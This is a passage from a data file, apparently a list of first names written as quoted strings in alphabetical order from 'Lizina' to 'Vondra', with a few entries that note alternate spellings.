'Lizina',
'Llewellyn',
'Lloyd',
'Loba',
'Lobo',
'Locke',
'Loe',
'Logan',
'Lois',
'Lola',
'Lolonyo',
'Lolovivi',
'Lolymiya',
'Loman',
'Lona',
'Lonato',
'London',
'Lonna',
'Lonni',
'Lonnie',
'Lonnit',
'Lora',
'Lorelei',
'Lorena',
'Lorenzo',
'Loretta',
'Lori',
'Lorie',
'Lorimer',
'Lorin',
'Loring',
'Lorna',
'Lorne',
'Lorraine',
'Lorretta',
'Lory',
'Lotta',
'Lotte',
'Lotus',
'Lou',
'Louanna',
'Loughlin',
'Louis',
'Louisa',
'Louise',
'Loura',
'Lourana',
'Lourdes',
'Lourine',
'Love',
'Lovette',
'Lovey',
'Lovie',
'Lowell',
'Luam',
'Luana',
'Lucas',
'Luce',
'Lucia',
'Lucian',
'Lucie',
'Lucille',
'Lucinda',
'Lucio',
'Lucius',
'Lucretia',
'Lucus',
'Lucy',
'Ludema',
'Ludlow',
'Ludwig',
'Luigi',
'Luis',
'Luke',
'Lula',
'Lulli',
'Lulu',
'Luna',
'Lundy',
'Lunette',
'Lupe',
'Lupita',
'Luthando',
'Luther',
'Ly',
'Lyannie',
'Lyde',
'Lydette',
'Lydia',
'Lyle',
'Lyn',
'Lynae',
'Lynch',
'Lynda',
'Lynde',
'Lyndel',
'Lyndon',
'Lyndsey',
'Lynelle',
'Lynette',
'Lynley',
'Lynn',
'Lynna',
'Lynne',
'Lynnea',
'Lynton',
'Lyre',
'Lyris',
'Lysa',
'Lysander',
'Lysandra',
'Maarten',
'Maat',
'Mabel',
'Mac',
'Macayle',
'Mace',
'Maceo',
'Macha',
'Mackenzie',
'Mactarr',
'Macy',
'Madaleno',
'Maddox',
'Madeleine',
'Madelia',
'Madeline',
'Madge',
'Madison & madyson',
'Madonna',
'Madra',
'Madrona',
'Mae',
'Maeko',
'Maemi',
'Maeron',
'Maeryn',
'Maeve',
'Magan',
'Magda',
'Magdalena',
'Magdalene',
'Magee',
'Maggie',
'Magnar',
'Magnolia',
'Magua',
'Maha',
'Mahala',
'Mahalia',
'Mahari',
'Mahdi',
'Mahitable',
'Mai',
'Maia',
'Maik',
'Maille',
'Maimun',
'Maire',
'Mairi',
'Maisie',
'Maj',
'Major',
'Makaih',
'Makaila',
'Makalah',
'Makale',
'Makalo',
'Makani',
'Makaveli',
'Makayla',
'Makenna',
'Makenzy',
'Makoto',
'Makya',
'Malachi',
'Malaika',
'Malana',
'Malane',
'Malasy',
'Malaya',
'Malcolm',
'Malia',
'Malik',
'Malin',
'Malina',
'Malise',
'Malissa',
'Malka',
'Mallory',
'Malo',
'Malomo',
'Malone',
'Malory',
'Malyn',
'Mamie',
'Mana',
'Mandel',
'Mandelina',
'Mandell',
'Mandy',
'Manica',
'Manina',
'Manning',
'Manolin',
'Manon',
'Mansa',
'Manuel',
'Manuela',
'Maori',
'Mara',
'Marash',
'Marc',
'Marcel',
'Marcell',
'Marcella',
'Marcello',
'Marcellus',
'Marchelle',
'Marcia',
'Marcie',
'Marco',
'Marcus',
'Marcy',
'Mardell',
'Mardi',
'Mare',
'Maree',
'Marek',
'Maren',
'Marenda',
'Margaret',
'Margarita',
'Marge',
'Margo',
'Margot',
'Marguerite',
'Mari',
'Maria',
'Mariah',
'Mariam',
'Marianne',
'Mariatu',
'Maribel',
'Maribeth',
'Marie',
'Mariel',
'Mariella',
'Marietta',
'Marigold',
'Marijke',
'Marika',
'Marilu',
'Marilyn',
'Marin',
'Marina',
'Marinel',
'Marino',
'Mario',
'Marion',
'Maris',
'Marisa',
'Marisela',
'Marisol',
'Marissa',
'Maritza',
'Marius',
'Marjean',
'Marjorie',
'Mark',
'Marka',
'Marlas',
'Marlena',
'Marlene',
'Marli',
'Marlie',
'Marlin',
'Marlo',
'Marlon',
'Marlow',
'Marly',
'Marnie',
'Marnin',
'Marnina',
'Maro',
'Marquette',
'Marquis',
'Marrim',
'Marsha',
'Marshall',
'Marta',
'Martha',
'Martin',
'Martina',
'Marty',
'Marv',
'Marva',
'Marvel',
'Marvela',
'Marvene',
'Marvin',
'Mary',
'Maryjane',
'Masada',
'Mashaka',
'Mason',
'Massimo',
'Matana',
'Mateo',
'Mathilda',
'Mathilde',
'Matia',
'Matias',
'Matilda',
'Matilde',
'Matisse',
'Matrika',
'Matsu',
'Matt',
'Matteo',
'Matthew',
'Matthias',
'Mattox',
'Matty',
'Matusio',
'Maude',
'Mauli',
'Maura',
'Maureen',
'Maurice',
'Maurilio',
'Maurizio',
'Mauro',
'Mauve',
'Maverick',
'Mavis',
'Max',
'Maxim',
'Maxima',
'Maxime',
'Maximilian',
'Maximos',
'Maxine',
'Maxwell',
'May',
'Maya',
'Mayan',
'Mayda',
'Mayes',
'Maylin',
'Maymay',
'Maynard',
'Mayra',
'Mazi',
'Mazya',
'Mazzy',
'Mcdade',
'Mckale',
'Mckayla',
'Mckenna',
'Mckenzie',
'Mckile',
'Mcnamara',
'Mea',
'Mead',
'Meagan',
'Meaghan',
'Meara',
'Meda',
'Medard',
'Medea',
'Meg',
'Megan',
'Meged',
'Meghan',
'Mehalia',
'Mei',
'Meinako',
'Meir',
'Mekayla',
'Mekelle',
'Mel',
'Mela',
'Melania',
'Melanie',
'Melantha',
'Melba',
'Melchior',
'Mele',
'Meli',
'Melia',
'Melina',
'Melinda',
'Meliora',
'Melisande',
'Melissa',
'Melita',
'Melody',
'Melora',
'Melosa',
'Melva',
'Melvin',
'Melvina',
'Melvyn',
'Mendel',
'Menora',
'Mercedes',
'Mercer',
'Mercia',
'Mercy',
'Meredith',
'Merethe',
'Meria',
'Meris',
'Merita',
'Merle',
'Merlin',
'Merlot',
'Merrick',
'Merrill',
'Merritt',
'Merry',
'Mersendies',
'Merton',
'Merv',
'Mervin',
'Mervyn',
'Meryl',
'Meryle',
'Meshal',
'Messina',
'Metea',
'Mettabel',
'Mia',
'Mialyn',
'Micaella',
'Micah',
'Micaiah',
'Michael',
'Michaela',
'Michal',
'Michel',
'Michele',
'Micheline',
'Michelle',
'Michiko',
'Michila',
'Michon',
'Mick',
'Mickey',
'Micol',
'Mieko',
'Miette',
'Migdana',
'Mignon',
'Mihoshi',
'Mika',
'Mikaili',
'Mikal',
'Mike',
    "Mike'aha",
'Mikey',
'Mikhail',
'Miki',
'Mikinea',
'Mikkel',
'Milan',
'Milandu',
'Mildred',
'Milena',
'Miles',
'Mili',
'Milia',
'Miliani',
'Miller',
'Millicent',
'Millie',
'Mills',
'Milly',
'Milo',
'Milt',
'Milton',
'Mimi',
'Mina',
'Minako',
'Minda',
'Mindy',
'Minerva',
'Miniya',
'Minna',
'Minnie',
'Minor',
'Minty',
'Mio',
'Mira',
'Mirabel',
'Mirabelle',
'Miracle',
'Miranda',
'Mircea',
'Mireille',
'Mirella',
'Miriam',
'Mirit',
'Miroslav',
'Mirra',
'Misae',
'Misha',
'Misty',
'Misu',
'Mitch',
'Mitchel',
'Mitchell',
'Mitsu',
'Miya',
'Miyana',
'Miyanda',
'Miyoko',
'Mizell',
'Moa',
'Moana',
'Moanna',
'Modesta',
'Modesty',
'Mohammed',
'Mohan',
'Moin',
'Moina',
'Moinuddin',
'Moira',
'Moji',
'Mojtaba',
'Moke',
'Molly',
'Mona',
'Monae',
'Monahan',
'Monica',
'Moniqua',
'Monique',
'Monita',
'Monroe',
'Montague',
'Montana',
'Monte',
'Montego',
'Montgomery',
'Monty',
'Moon',
'Moon-unit',
'Mora',
'Morag',
'Moral',
'Morathi',
'Mordecai',
'More',
'Morela',
'Morey',
'Morgan',
'Morgana',
'Moriah',
'Moriba',
'Morley',
'Morna',
'Morrie',
'Morrigan',
'Morris',
'Morrison',
'Morse',
'Mort',
'Mortimer',
'Morton',
'Morty',
'Morwenna',
'Moses',
'Moshe',
'Moss',
'Mostapha',
'Mostyn',
'Moya',
'Moyna',
'Mrena',
'Muhammad',
'Mulan',
'Muliya',
'Muna',
'Mura',
'Muriel',
'Murphy',
'Murray',
'Murron',
'Musoke',
'Mustafa',
'Mutia',
'Mya',
'Mykel',
'Myles',
'Myra',
'Myrilla',
'Myrladis',
'Myrna',
'Myron',
'Myrtle',
'Myson',
'Myte',
'Naal',
'Nada',
'Nadia',
'Nadie',
'Nadina',
'Nadine',
'Naeco',
'Nafis',
'Nafuna',
'Naghmeh',
'Naila',
'Naiser',
'Najee',
'Najla',
'Najmeh',
'Nakeisha',
'Nakima',
'Nalo',
'Nalonnie',
'Namir',
'Nan',
'Nancy',
'Nanette',
'Nani',
'Naoise',
'Naolin',
'Naoll',
'Naomi',
'Napoleon',
'Nara',
'Narain',
'Narcisse',
'Nardo',
'Narelle',
'Nariah',
'Nariko',
'Narma',
'Nascha',
'Naseem',
'Nasha',
'Nasia',
'Nasser',
'Nat',
'Natala',
'Natalia',
'Natalie',
'Nataly & natalya',
'Natane',
'Natasha',
'Nate',
'Natesa',
'Nathalie',
'Nathan',
'Nathanael or nathaniel',
'Natine',
'Natividad',
'Natori',
'Natsu',
'Nature',
'Nav',
'Nava',
'Navarro',
'Naveen',
'Navid',
'Navora',
'Nawal',
'Nayati',
'Nayelis',
'Nayer',
'Naysa',
'Nazli',
    "N'dea",
'Neal',
'Nealon',
'Necia',
'Neda',
'Nedim',
'Nedra',
'Neely',
'Neena',
'Neetee',
'Nefertiti',
'Neil',
'Nelia',
'Nell',
'Nellie',
'Nelson',
'Nemesis',
'Nen',
'Nenet',
'Neola',
'Nephtalie',
'Nerina',
'Nerine',
'Nerissa',
'Nerita',
'Nero',
'Nessa',
'Nessan',
'Nestor',
'Netanya',
'Neva',
'Nevada',
'Nevan',
'Neville',
'Newman',
'Neydi',
'Neylan',
'Nia',
'Niabi',
'Niall',
'Niamh',
'Nichelle',
'Nicholai',
'Nicholas',
'Nichole',
'Nick',
'Nicki',
'Nicodemus',
'Nicola',
'Nicole',
'Nicoletta',
'Nicolette',
'Nidia',
'Nieca',
'Niel',
'Nieves',
'Nigel',
'Nijole',
'Nika',
'Nikhil',
'Nikiesha',
'Nikita',
'Nikki',
'Nikkos',
'Nikoi',
'Nikola',
'Nikole',
'Niks',
'Niles',
'Nimeesha',
'Nina',
'Ninfa',
'Ninon',
'Nira',
'Nire',
'Nirel',
'Nishi',
'Nissa',
'Nita',
'Nitin',
'Nitara',
'Nitesh',
'Nitis',
'Niv',
'Nixie',
'Nizana',
'Noah',
'Noam',
'Nodin',
'Noe',
'Noel',
'Noelani',
'Noell',
'Nokomis',
'Nola',
'Nolan',
'Noland',
'Noma',
'Nomar',
'Nomlanga',
'Nona',
'Nonnie',
'Nora',
'Norah',
'Noreen',
'Nori',
'Norina',
'Norm',
'Norma',
'Norman',
'Normandy',
'Norris',
'Norton',
'Norwood',
'Nova',
'Novalee',
'Novia',
'Nowles',
'Noxolo',
'Noya',
'Nuhad',
'Nuncio',
'Nuri',
'Nuru',
'Nya',
'Nyako',
'Nydia',
'Nyeki',
'Nyler',
'Nyoka',
'Nysa',
'Nyx',
'Oafe',
'Oanh',
'Oakes',
'Oakley',
'Obadiah',
'Obedience',
'Oberon',
'Obert',
'Oceana',
'Octavia',
'Octavio',
'Octavious',
'Odele',
'Odelia',
'Odell',
'Odessa',
'Odetta',
'Odette',
'Odile',
'Odina',
'Odysseus',
'Oedipus',
'Ofer',
'Ogden',
'Ogima',
'Ohio',
'Oistin',
'Okal',
'Okalik',
'Okapi',
'Oke',
'Okechuku',
'Okoth',
'Oksana',
'Ola',
'Olaf',
'Olathe',
'Oleg',
'Olesia',
'Olga',
'Oliana',
'Olin',
'Olinda',
'Olive',
'Oliver',
'Olivia',
'Ollie',
'Olympia',
'Oma',
'Omar',
'Ombler',
'Omega',
'Ona',
'Onan',
'Ondette',
'One',
'Oneida',
'Oni',
'Onslow',
'Oona',
'Opa',
'Opal',
'Ophelia',
'Ophira',
'Oprah',
'Ora',
'Oral',
'Oralee',
'Oran',
'Orane',
'Orde',
'Oren',
'Orenda',
'Oria',
'Oriana',
'Oriel',
'Orien',
'Oringo',
'Orino',
'Oriole',
'Orion',
'Orla',
'Orlando',
'Orleans',
'Orlee',
'Orli',
'Orly',
'Orma',
'Ormand',
'Ornice',
'Orrick',
'Orsen',
'Orsin',
'Orson',
'Orton',
'Orville',
'Osanna',
'Osaze',
'Osborn',
'Osborne',
'Oscar',
'Osgood',
'Osias',
'Oskar',
'Osma',
'Osmond',
'Ossian',
'Ossie',
'Oswald',
'Othello',
'Otis',
'Otto',
'Ouray',
'Ova',
'Overton',
'Ovid',
'Owen',
'Ownah',
'Oz',
'Ozzie',
'Pabla',
'Pablo',
'Pace',
'Pacey',
'Packard',
'Paco',
'Paddy',
'Padhraig',
'Padraic',
'Page',
'Paige',
'Paisley',
'Palani',
'Palesa',
'Paley',
'Pallas',
'Palma',
'Palmer',
'Paloma',
'Palti',
'Pamela',
'Pamelalee',
'Pamelia',
'Pammay',
'Pancho',
'Pandora',
'Panfila',
'Paniga',
'Panya',
'Paola',
'Paolo',
'Papina',
'Paris',
'Parisa',
'Parker',
'Parkin',
'Parlan',
'Parley',
'Parrish',
'Parry',
'Parsifal',
'Parson',
'Pascal',
'Pascale',
'Pascha',
'Pasi',
'Patch',
'Patience',
'Patrice',
'Patricia',
'Patrick',
'Patsy',
'Patty',
'Paul',
'Paula',
'Paulette',
'Paulina',
'Pauline',
'Paulo',
'Paulos',
'Pavithra',
'Paxton',
'Payil',
'Payton',
'Paz',
'Peale',
'Pearl',
'Pearlie',
'Pearly',
'Pebbles',
'Pedro',
'Peggy',
'Peivi',
'Pelagia',
'Pelham',
'Pembroke',
'Pena',
'Penelope',
'Penn',
'Penney',
'Pennie',
'Penny',
'Penrod',
'Peony',
'Pepe',
'Pepper',
'Percival',
'Percy',
'Perdita',
'Perdy',
'Peregrine',
'Peri',
'Perrin',
'Perry',
'Pete',
'Peter',
'Petra',
'Petronella',
'Petula',
'Petunia',
'Peyton',
'Phaedra',
'Pharzam',
'Phemia',
'Phenia',
'Phiala',
'Phil',
'Phila',
'Philana',
'Phillia',
'Philo',
'Philopena',
'Philip',
'Phillip',
'Philomena',
'Philyra',
'Phindiwe',
'Phoebe',
'Phoenix',
'Phylicia',
'Phylisia',
'Phyliss',
'Phyllis',
'Phyre',
'Pia',
'Picabo',
'Pier',
'Piera',
'Pierce',
'Pierre',
'Pierrette',
'Pilar',
'Pillan',
'Piper',
'Pirro',
'Piuta',
'Placido',
'Plato',
'Platt',
'Pleasance',
'Plennie',
'Po mya',
'Polly',
'Polo',
'Ponce',
'Poppy',
'Poria',
'Porsha',
'Porter',
'Portia',
'Posy',
'Powa',
'Prentice',
'Prescott',
'Presencia',
'Presley',
'Preston',
'Price',
'Primo',
'Prince',
'Princessa',
'Priscilla',
'Priya',
'Procopia',
'Prudence',
'Prue',
'Prunella',
'Pryderi',
'Psyche',
'Pyralis',
'Qabil',
'Qamar',
'Qiana',
'Qing-jao',
'Quade',
'Quana',
'Quanda',
'Quang',
'Queenie',
'Quella',
'Quennell',
'Quentin',
'Querida',
'Quiana',
'Quilla',
'Quillan',
'Quimby',
'Quin',
'Quincy',
'Quinella',
'Quinlan',
'Quinn',
'Quinta',
'Quintana',
'Quintin',
'Quinto',
'Quinton',
'Quirino',
'Quolan',
'Quon',
'Qwin',
'Rabertina',
'Rabia',
'Rach',
'Rachael',
'Rachel',
'Rachelle',
'Radley',
'Radwan',
'Rae',
'Raeanne',
'Raegan',
'Raemarie',
'Rafael',
'Raffaello',
'Rafi',
'Rai',
'Raimi',
'Rain',
'Raina',
'Raine',
'Rainer',
'Raisa',
'Raja',
'Raleigh',
'Ralph',
'Ram',
'Ramie',
'Ramiro',
'Ramon',
'Ramona',
'Ramses',
'Ranae',
'Randall',
'Randi (alternate forms: randie, randee, randey)',
'Randilyn',
'Randolph',
'Randy',
'Rane',
'Ranee',
'Rania',
'Ranit',
'Raphael',
'Raphaela',
'Raquel',
'Rasha',
'Rashida',
'Rasia',
'Raul',
'Raven',
'Ravi',
'Ray',
'Raymond',
'Raynell',
'Rayya',
'Razi',
'Razvan',
'Rea',
'Read',
'Reagan',
'Reann',
'Reanna',
'Reasha',
'Reba',
'Rebecca',
'Rebekah',
'Red',
'Redell',
'Redford',
'Redina',
'Reed',
'Reent',
'Reese',
'Reeves',
'Regan',
'Regina',
'Reginald',
'Reilly',
'Reina',
'Remedy',
'Rememberance',
'Remi',
'Remick',
'Remington',
'Remy',
'Ren',
'Rena',
'Renata',
'Renate',
'Rene',
'Renee',
'Renny',
'Reth',
'Reuben',
'Reva',
'Revel',
'Revelin',
'Revelpedro',
'Rex',
'Rey',
'Reye',
'Reyna',
'Reynalynn',
'Reynard',
'Reynold',
'Reza',
'Rhasheem',
'Rhea',
'Rhett',
'Rhiannon',
'Rhoda',
'Rhodes',
'Rhona',
'Rhonda',
'Rhoswen',
'Rhylee',
'Rhys',
'Ria',
'Rianna',
'Rianne',
'Riannon',
'Ricardo',
'Rich',
'Richann',
'Richard',
'Ricjunette',
'Rick',
'Rickesha',
'Rico',
'Rider',
'Riene',
'Rigg',
'Riley',
'Rimca',
'Rimona',
'Rin',
'Rina',
'Ringo',
'Riona',
'Riordan',
'Risa',
'Rita',
'Riva',
'River',
'Rivka',
'Rob',
'Robbin',
'Robert',
'Roberta',
'Robin',
'Robyn',
'Rocco',
'Rochelle',
'Rocio',
'Rock',
'Rockne',
'Rockwell',
'Rocky',
'Rod',
'Rodd',
'Roddy',
'Roderick',
'Rodney',
'Roger',
'Roland',
'Rolando',
'Rolf',
'Rollo',
'Romaine',
'Roman',
'Romeo',
'Rona',
'Ronald',
'Ronalee',
'Ronan',
'Ronat',
'Ronda',
'Ronia',
'Ronica',
'Ronisha',
'Ronli',
'Ronna',
'Ronnie',
'Ronny',
'Roosevelt',
'Rori',
'Rory',
'Ros',
'Rosa',
'Rosalba',
'Rosalia',
'Rosalind',
'Rosalita',
'Rosalyn',
'Rosamunde',
'Rose',
'Roseanne',
'Roselani',
'Rosemary',
'Roshaun',
'Rosie',
'Rosine',
'Ross',
'Rossa',
'Rothrock',
'Rowan',
'Rowdy',
'Rowena',
'Roxanne',
'Roy',
'Royce',
'Roz',
'Roza',
'Ruairi',
'Ruana',
'Ruby',
'Rudolph',
'Rudra',
'Rudy',
'Rufina',
'Rufus',
'Ruggiero',
'Rui',
'Rumer',
'Runa',
'Rune',
'Rupert',
'Rupetina',
'Russ',
'Russell',
'Russom',
'Rusti',
'Rusty',
'Ruth',
'Ruza',
'Ryan',
'Rydell',
'Ryder',
'Ryk',
'Ryker',
'Rylan',
'Ryland',
'Rylee',
'Rylie',
'Ryne',
'Ryo',
'Ryoko',
'Saba',
'Sabeeka',
'Sabina',
'Sabine',
'Sabra',
'Sabrina',
'Sachi',
'Sadie',
'Sadiki',
'Sadira',
'Safara',
'Saffron',
'Safina',
'Sage',
'Sahara',
'Saidi',
'Sailor',
'Saja',
'Saku',
'Sakura',
'Sal',
'Salena',
'Salene',
'Sally',
'Salome',
'Salvador',
'Salvatore',
'Sam',
'Samantha',
'Samia',
'Samson',
'Samuel',
'Sana',
'Sandra',
'Sandro',
'Sandy',
'Sanford',
'Sanjay',
'Sanjeet',
'Sanne',
'Santa',
'Santana',
'Santiago',
'Santo',
'Santos',
'Sanyu',
'Sapphire',
'Sara',
'Sarabrynn',
'Sarah',
'Sarahlyn',
'Sarai',
'Saraid',
'Sarama',
'Sarda',
'Sargent',
'Sarissa',
'Sarita',
'Sarki',
'Sarren',
'Sasami',
'Sasha',
'Sasilvia',
'Saskia',
'Satchel',
'Satin',
'Satinka',
'Satori',
'Satu',
'Saul',
'Savanna',
'Savannah',
'Saville',
'Savion',
'Savon',
'Sawyer',
'Saxen',
'Saxon',
'Saxton',
'Sayaan',
'Sayward',
'Scarlet',
'Scarlett',
'Schuyler',
'Schyler',
'Schylor',
'Scot',
'Scott',
'Scout',
'Seamus',
'Sean',
'Seanna',
'Season',
'Sebastian',
'Sebastien',
'Seda',
'Seema',
'Sef',
'Seghen',
'Seiko',
'Sela',
'Selas',
'Selena',
'Selene',
'Selia',
'Selima',
'Selina',
'Selma',
'Sema',
'Semele',
'Semir',
'Semira',
'Senalda',
'Senia',
'Sephora',
'September',
'Sequoia',
'Sera',
'Serafina',
'Serena',
'Serenity',
'Serepta',
'Serge',
'Sergio',
'Serwa',
'Seth',
'Seven',
'Severino',
'Sevinc',
'Seveyn',
'Sevilla',
'Seville',
'Seymour',
'Shacher',
'Shaelynn',
'Shaina',
'Shainah',
'Shakia',
'Shakila',
'Shakir',
'Shakira',
'Shakti',
'Shakur',
'Shakura',
'Shalaidah',
'Shalamar',
'Shalimar',
'Shaman',
'Shamar',
'Shamara',
'Shamira',
'Shamon',
'Shamus',
'Shana',
'Shandi',
'Shandrell',
'Shane',
'Shani',
'Shania',
'Shanity',
'Shanlee',
'Shanna',
'Shannen',
'Shannon',
'Shanon',
'Shante',
'Shantell',
'Shaquille',
'Sharis',
'Sharlene',
'Sharne',
'Sharon',
'Shasa',
'Shaun',
'Shauna',
'Shaunna',
'Shavonda',
'Shavonne',
'Shaw',
'Shawn',
'Shawnda',
'Shawna',
'Shawndell',
'Shay',
'Shea',
'Sheadon',
'Sheba',
'Sheehan',
'Sheena',
'Sheera',
'Sheila',
'Shel',
'Shelby',
'Sheldon',
'Shella',
'Shelley',
'Shelly',
'Shenelle',
'Sheri',
'Sheridan',
'Sherine',
'Sherise',
'Sherisse',
'Sherman',
'Shermel',
'Sherri',
'Sherry',
'Sheryl',
'Shieefera',
'Shiela',
'Shifra',
'Shiloh',
'Shimon',
'Shing',
'Shino',
'Shira',
'Shiran',
'Shiri',
'Shirley',
'Shirlyn',
'Shlomo',
'Shneek',
'Shona',
'Shoshana',
'Shoshanah',
'Shubha',
'Shyan',
'Shyler',
'Sian',
'Sibley',
'Sibyl',
'Sid',
'Sidhartha',
'Sidney',
'Sidonia',
'Sidra',
'Siegfried',
'Sienna',
'Sierra',
'Signa',
'Sigrid',
'Sika',
'Silvain',
'Silvan',
'Silvana',
'Silver',
'Silvio',
'Sim',
'Sima',
'Simba',
'Simeon',
'Simon',
'Simone',
'Sinclair',
'Sine',
'Sinead',
'Sinjin',
'Sinjon',
'Siobhan',
'Sirus',
'Sissy',
'Sivney',
'Skip',
'Skipper',
'Skylar',
'Skyler',
'Slade',
'Sloan',
'Sloane',
'Slone',
'Smedley',
'Smith',
'Snow',
'Snowy',
'Sofia',
'Sohl-bin',
'Sokphorn',
'Sol',
'Solace',
'Solana',
'Solange',
'Solangel',
'Sole',
'Soleil',
'Solomon',
'Son',
'Sondo',
'Sondra',
'Sonel',
'Sonia',
'Sonja',
'Sonnagh',
'Sonora',
'Sonya',
'Sophia',
'Sophie',
'Sora',
'Sorcha',
'Soren',
'Sorley',
'Spence',
'Spencer',
'Speranza',
'Spike',
'Spring',
'Stacey',
'Stacia',
'Stacy',
'Stan',
'Stanislaus',
'Stanislav',
'Stanislaw',
'Stanley',
'Stanton',
'Star',
'Starla',
'Starr',
'Stavros',
'Stefan',
'Stefanie',
'Steffi',
'Steffie',
'Stefon',
'Stella',
'Step',
'Stephan',
'Stephanie',
'Stephen',
'Stephenie',
'Sterling',
'Stesha',
'Steve',
'Steven',
'Stevie',
'Stew',
'Stewart',
'Stillman',
'Stockton',
'Stone',
'Storm',
'Stormy',
'Strom',
'Stu',
'Stuart',
'Studs',
'Sue',
'Sugar',
'Sukey',
'Suki',
'Sulis',
'Sullivan',
'Sully',
'Sumana',
'Summer',
'Sundeep',
'Sunee',
'Sunny',
'Susan',
'Susane',
'Susanna',
'Susannah',
'Susie',
'Sutton',
'Suzanne',
'Suzette',
'Suzy',
'Svein',
'Sveta',
'Sybil',
'Sydnee',
'Sydney',
'Sylest',
'Sylvain',
'Sylvester',
'Sylvia',
'Sylvie',
'Synan',
'Synclair',
'Syshe',
    "Ta'ib",
'Tab',
'Taban',
'Taber',
'Tabetha',
'Tabitha',
'Tacita',
'Tacy',
'Tad',
'Tadelesh',
'Tadhg',
'Taffy',
'Tahlib',
'Tai',
'Taifa',
'Tailynn',
'Taima',
'Tait',
'Taja',
'Tajanea',
'Takeshi',
'Tala',
'Talasi',
'Talen',
'Talia',
'Taliesin',
'Taliliikilyit',
'Talisa',
'Talisha',
'Talitha',
'Tallah',
'Tallis',
'Tallulah',
'Talmai',
'Talynn',
'Tam',
'Tama',
'Tamah',
'Tamara',
'Tamasha',
'Tamasine',
'Tamatha',
'Tambre',
'Tamera',
'Tameron',
'Tamika',
'Tamma',
'Tammy',
'Tamra',
'Tamsen',
'Tamsin',
'Tamzin',
'Tana',
'Tandice',
'Tanesia',
'Tania',
'Tanika',
'Tanisha',
'Tanith',
'Tanna',
'Tannar',
'Tanner',
'Tannor',
'Tanya',
'Tao',
'Tara',
'Tarah',
'Taran',
'Tarana',
'Tarek',
'Tarika',
'Tarin',
'Tariq',
'Taru',
'Taryn',
'Tasha',
'Tasida',
'Tasmine',
'Tassos',
'Tate',
'Tatiana',
'Tatum',
'Tauja',
'Taurean',
'Tave',
'Taveon',
'Tavi',
'Tavia',
'Tavish',
'Tavita',
'Tawana',
'Taya or taia',
'Tayla',
'Taylah',
'Taylor',
'Tazara',
'Tea',
'Teagan',
'Teague',
'Teal',
'Tecla',
'Ted',
'Teddy',
'Teenie',
'Tefo',
'Teige',
'Tekevia',
'Teleza',
'Teli',
'Telly',
'Telma',
'Temima',
'Temira',
'Templeton',
'Tenen',
'Tennille',
'Teo',
'Terah',
'Terena',
'Terence',
'Terentia',
'Teresa',
'Terina',
'Termon',
'Terra',
'Terran',
'Terrel',
'Terrence',
'Terris',
'Terry',
'Terryal',
'Tertius',
'Tertullian',
'Teshi',
'Tess',
'Tessa',
'Teva',
'Tevani',
'Tevin',
'Tex',
'Texil',
'Thackery',
'Thad',
'Thaddeus',
'Thadeus',
'Thady',
'Thais',
'Thalassa',
'Thalia',
'Than',
'Thandeka',
'Thane',
'Thanh',
'Thatcher',
'Thayer',
'Thea',
'Thel',
'Thelma',
'Thema',
'Themba',
'Theo',
'Theodora',
'Theodore',
'Theresa',
'Therese',
'Thina',
'Thom',
'Thomas',
'Thomasina',
'Thor',
'Thora',
'Thorin',
'Thornton',
'Thrine',
'Thron',
'Thurman',
'Thuy',
'Thyra',
'Tia',
'Tiana & tiannah',
'Tiara',
'Tiaret',
'Tiassale',
'Tidus',
'Tiere',
'Tierney',
'Tiffany',
'Tilden',
'Tillie',
'Tilly',
'Tim',
'Timothy',
'Timu',
'Tina',
'Tino',
'Tip',
'Tirza',
'Tirzah',
'Tisha',
'Titan',
'Titus',
'Tivona',
'Toan',
'Toben',
'Tobin',
'Tobit',
'Toby',
'Tod',
'Todd',
'Toki',
'Tolla',
'Tom',
'Tomas',
'Tommy',
'Tomo',
'Tonette',
'Toni',
'Tony',
'Tonya',
'Topaz',
'Topaza',
'Topo',
'Topper',
'Tori',
'Torie',
'Torn',
'Torrance',
'Torrin',
'Tory',
'Tosca',
'Tosha',
'Toshi',
'Toshia',
'Totie',
'Tova',
'Tovah',
'Tovi',
'Townsend',
'Toya',
'Toyah',
'Tracey',
'Tracie',
'Tracy',
'Traelic-an',
'Trahern',
'Tranquilla',
'Trapper',
'Trava',
'Travis',
'Traven',
'Trella',
'Trent',
'Trenton',
'Tressa',
'Tresure',
'Trevon',
'Trevor',
'Trey',
'Tricia',
'Trilby',
'Trina',
'Trinady',
'Trini',
'Trinity',
'Trish',
'Trisha',
'Trista',
'Tristan',
'Tristana',
'Tristessa',
'Tristram',
'Trixie',
'Trory',
'Troy',
'Truda',
'Trude',
'Trudy',
'Truitt',
'Trula',
'Truly',
'Truman',
'Tryphena',
'Tucker',
'Tudor',
'Tuesday',
'Tulla',
'Tully',
'Tumo',
'Tuyen',
'Twila',
'Twyla',
'Ty',
'Tyan',
'Tyanne',
'Tybal',
'Tyler',
'Tylynn',
'Tyme',
'Tyne',
'Tynley',
'Tyra',
'Tyree',
'Tyrell',
'Tyrick',
'Tyriq',
'Tyrone',
'Tyrus',
'Tyson',
'Uang',
'Uba',
'Uday',
'Ugo',
'Ujana',
'Ukiah',
'Ula',
'Ulan',
'Ulani',
'Ulema',
'Ulf',
'Ull',
'Ulla',
'Ulric',
'Ulysses',
'Uma',
'Umay',
'Umberto',
'Umeko',
'Umi',
'Ummi',
'Una',
'Unity',
'Upendo',
'Urania',
'Urbain',
'Urban',
'Uri',
'Uriah',
'Uriel',
'Urilla',
'Urit',
'Ursa',
'Ursala',
'Ursula',
'Uta',
'Utana',
'Ute',
'Utina',
'Uzma',
'Vail',
'Val',
'Vala',
'Valarie',
'Valbona',
'Valeda',
'Valencia',
'Valene',
'Valentina',
'Valentine',
'Valeria',
'Valerie',
'Valeska',
'Valiant',
'Vallerie',
'Valtina',
'Valyn',
'Van',
'Vance',
'Vandalin',
'Vanessa',
'Vangie',
'Vanna',
'Varae',
'Varen',
'Vaschel',
'Vashti',
'Vashni',
'Vatusia',
'Vaughan',
'Vaughn',
'Vea',
'Veasna',
'Veda',
'Vega',
'Velaura',
'Velma',
'Venedict',
'Venetia',
'Vera',
'Verda',
'Verdi',
'Vern',
'Verna',
'Verne',
'Verneil',
'Vernon',
'Veronica',
'Vesta',
'Vevay',
'Vevina',
'Vi',
'Vianey',
'Vic',
'Vicki',
'Vicky',
'Victor',
'Victoria',
'Vida',
'Vidal',
'Vidor',
'Vienna',
'Vila',
'Vince',
'Vincent',
'Vine',
'Vinnie',
'Vinny',
'Vinson',
'Viola',
'Violet',
'Virgil',
'Virgina',
'Virginia',
'Visola',
'Vita',
'Vitalis',
'Vito',
'Vittorio',
'Vivek',
'Vivi',
'Vivian',
'Viviana',
'Vivienne',
'Vlad',
'Vladimir',
'Volleny',
'Von',
'Vonda',
'Vondila',
'Vondra',
